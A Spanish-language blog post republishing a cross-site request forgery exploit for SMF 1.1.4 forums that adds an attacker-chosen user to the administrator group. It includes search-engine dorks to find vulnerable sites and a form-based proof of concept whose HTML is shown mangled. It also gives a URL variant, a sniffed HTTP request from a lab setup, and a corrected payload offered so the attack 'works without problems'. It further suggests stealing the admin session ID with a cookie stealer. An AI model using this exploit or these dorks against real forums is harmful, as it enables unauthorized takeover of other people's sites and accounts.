Ir al contenido principal

SMF 1.1.4 - Add User In Group [CSRF]

Bueno en primera este post lo saque de remoteexecution.es el link es este:

http://www.remoteexecution.es/foro/index.php?topic=879

Dork: "SMF 1.1.4"
Dork (SID): inurl:index.php inurl:sid= "SMF 1.1.4"


< h t m l >
< h e a d >
< b o d y >
< action="http://adress.com/path/index.php?action=membergroups;sa=members;group=GroupID" method="post" type="text" name="toAdd" id="toAdd" size="30">
< type="submit" name="add" value="Add Members">
< type="hidden" name="sc" value="ADMIN SESSION ID">
< /form>
< /body>
< /html>

o si no tambien se puede usar

forum/path/index.php?action=membergroups;sa=members;group=groupid;toAdd=usertoadd&add=Add+Members&sc=sid
by Syntacks!

Todo lo que usted necesita es administrador identificación de la sesión (SID), intentan engañar a los admin (utilizando cookie stealer etc ..)

|| *************** ||
|| Author: phAnt0mh4ck3r ||
|| ************************* ||
|| SMF 1.1.4 - Add User In Group [CSRF] ||
|| ________________________________________________________________ ||
|_________________________________________________________________________


ahora lo pongo por la explicacion de aqui abajo :-P

Bueno platicando con Em3Trix me dijo que no le funcionaba y demas entonces cheke el code que ponen aqui lo revise un poco y vi que no daba por que no ponia nada de usuario, generalmente saben que lo hace para evitar un copy paste (o scriptkiddies :-P) :P entonces bueno dije veamos que pasa y que falta puse mi backtrack, y dos maquinas en lindows una de ellas en vmware, me conecte a mi red local y en una tenia montado smf, en la otra de lindows era donde hiba a hacer los cambios y en la de backtrack es donde iba a snnifear que es como se sacan los CSRF (snnifeando) :P ok puse mi ettercap en accion xD y el resultado fue esto:


POST /smf/index.php?action=profile2 HTTP/1.1.
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*.
Referer: http://192.168.1.64/smf/index.php?action=profile;u=2;sa=account.
Accept-Language: es.
Content-Type: application/x-www-form-urlencoded.
Accept-Encoding: gzip, deflate.
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1).
Host: 192.168.1.64.
Content-Length: 260.
Connection: Keep-Alive.
Cache-Control: no-cache.
Cookie: PHPSESSID=0585e394dfabf69c18a586d91b93ae84; SMFCookie956=a%3A4%3A%7Bi%3A0%3Bs%3A1%3A%221%22%3Bi%3A1%3Bs%3A40%3A%22596fe11e6a4ac2039e5d80c345060d6c5b1dcbd8%22%3Bi%3A2%3Bi%3A1390709326%3Bi%3A3%3Bi%3A0%3B%7D.
.
realName=prueba&dateRegistered=2007-12-27&posts=0&ID_GROUP=1&additionalGroups%5B%5D=0&emailAddress=prueba@prueba.com&hideEmail=0&showOnline=0&showOnline=1&passwrd1=&passwrd2=&secretQuestion=&secretAnswer=&sc=7480880c30be3b8e5b1dc32a3755150f&userID=2&sa=accountHTTP/1.1 302 Found.
Date: Mon, 28 Jan 2008 04:09:50 GMT.
Server: Apache/2.2.4 (Win32) PHP/5.2.3.
X-Powered-By: PHP/5.2.3.
Expires: Thu, 19 Nov 1981 08:52:00 GMT.
Cache-Control: private.
Pragma: no-cache.
Location: http://192.168.1.64/smf/index.php?action=profile;u=2;sa=account.
Content-Encoding: gzip.
Vary: Accept-Encoding.
Content-Length: 26.
Keep-Alive: timeout=5, max=100.
Connection: Keep-Alive.
Content-Type: text/html.


no pongo todo el resultaod si no solo lo mas importante :-P

en la parte de:

realName=prueba&dateRegistered=2007-12-27&posts=0&ID_GROUP=1&additionalGroups%5B%5D=0&emailAddress=prueba@prueba.com&hideEmail=0&showOnline=0&showOnline=1&passwrd1=&passwrd2=&secretQuestion=&secretAnswer=&sc=7480880c30be3b8e5b1dc32a3755150f&userID=2&sa=accountHTTP/1.1

ahi se ve lo primero quees realName entonces ya le dije a Em3Trix que esa era la unica parte que faltaba y la agregara en el code y quedaria asi:

(se agrego esa parte por que es el identificador de usuario, tal vez tambine se pueda con el id de registro del user :-) )

< h t m l >
< h e a d >
< b o d y >
< action="http://localhost/foro/index.php?action=membergroups;sa=members;group=1;realName=Em3Trix" method="post" type="text" name="toAdd" id="toAdd" size="30">
< type="submit" name="add" value="Add Members">
< type="hidden" name="sc" value="ADMIN SESSION ID">
< /form>
< /body>
< /html>


donde realName sera el nombre del usuario que quieren elevar los privilegios y el group=1 es el grupo de administradores

entonces ahi tienen para que les funcione bien y sin problemas :-)

Saludos

Komtec1

Comentarios

Anónimo ha dicho que…
Este comentario ha sido eliminado por un administrador del blog.
Anónimo ha dicho que…
Este comentario ha sido eliminado por un administrador del blog.
Anónimo ha dicho que…
Este comentario ha sido eliminado por un administrador del blog.
Anónimo ha dicho que…
Este comentario ha sido eliminado por un administrador del blog.

Entradas populares de este blog

Como un simple cambio de nombre en una fanpage me llevó con un bypass en el sistema linkshim de Facebook

Como un simple cambio de nombre en una fanpage me llevó con un bypass en el sistema linkshim de Facebook  Todo inició con el rediseño de marca de un noticiero digital, en el cuál se cambió el nombre, se cambió el logotipo, se cambiaron los nombres de twitter, el usuario de twitter, el instagram, pero OH! al llegar a facebook y hacer el cambio de url de dominio no hubo problema, pero el querer cambiar el nombre inició la pesadilla... "No podemos cambiar tu nombre de dominio debido a que puede ser engañoso para tus usuarios, etc... etc... etc...". Eso es lo primero que me llegó al intentar cambiar el nombre de dominio, pero para mi suerte, vi un botón de "apelación". ¡Que bien! Puedo apelar y dar mis razones de por qué estoy cambiando el nombre.  Y así empiezo:  " Querido FB, Recientemente la empresa xxxx está en un rediseño de marca e imagen, por lo que agradecería puedan ayudarme con el cambio de nom...

Solución [fix] a hamachi Logging in .. failed, busy

Hola! Aquí con una pequeña entrada, pero que a más de uno le será útil. Tengo hamachi instalado en varias máquinas, pero en una precisamente al reiniciar, algunas veces me da este problema: usuarioserver@server:~$ sudo hamachi login [sudo] password for usuarioserver: Logging in .. failed, busy Lo busqué en internet y la "solución" que dan, es reinstalar hamachi, y para los que han instalado hamachi en ubuntu, saben que no es una opción, pues se tendrían que hacer estos pasos:  sudo apt-get remove logmein-hamachi sudo dpkg -i logmein-hamachixxx.deb sudo apt-get install -f Para lo cual (siempre) es molesto hacer esos pasos, y algunas veces la configuración se llega a perder.  Para solucionar ese problema, basta con hacer un:  sudo /etc/init.d/logmein-hamachi force-reload Esto forzará el reinicio de hamachi, y así después hacen:  sudo hamachi login Y listo, el problema de failed busy desaparece y los deja loguear bien en la re...

Integrar API de Google Maps, archivos kml, kmz y otras fumarolas :D

Ya que andamos en eso de la posteada ahora les voy a dejar un pequeño manual sobre como integrar la API de maps (google) dentro de nuestro código, hay varia documentación en la página developers de google, pero realmente lo que uno busca cuando pone en google: "integrar api de maps" es ver un ejemplo claro y directo para que se pueda entender de mejor forma. Así que pues ya comentada la información de arriba les paso a dejar un ejemplo. Lo primero que tenemos que poner en nuestro código es la llamada a la API de maps: < script type = " text/javascript " src = " http://maps.googleapis.com/maps/api/js?sensor=false&language=es " > < / script > En este caso la variable sensor está en false, esto nos indica que no hay un dispositivo gps que pueda tomar la ubicación (se pone generalmente en true cuando es para aplicación movil, llámese celular o tableta) El lenguaje declaramos español, esto es para los menús que se van a most...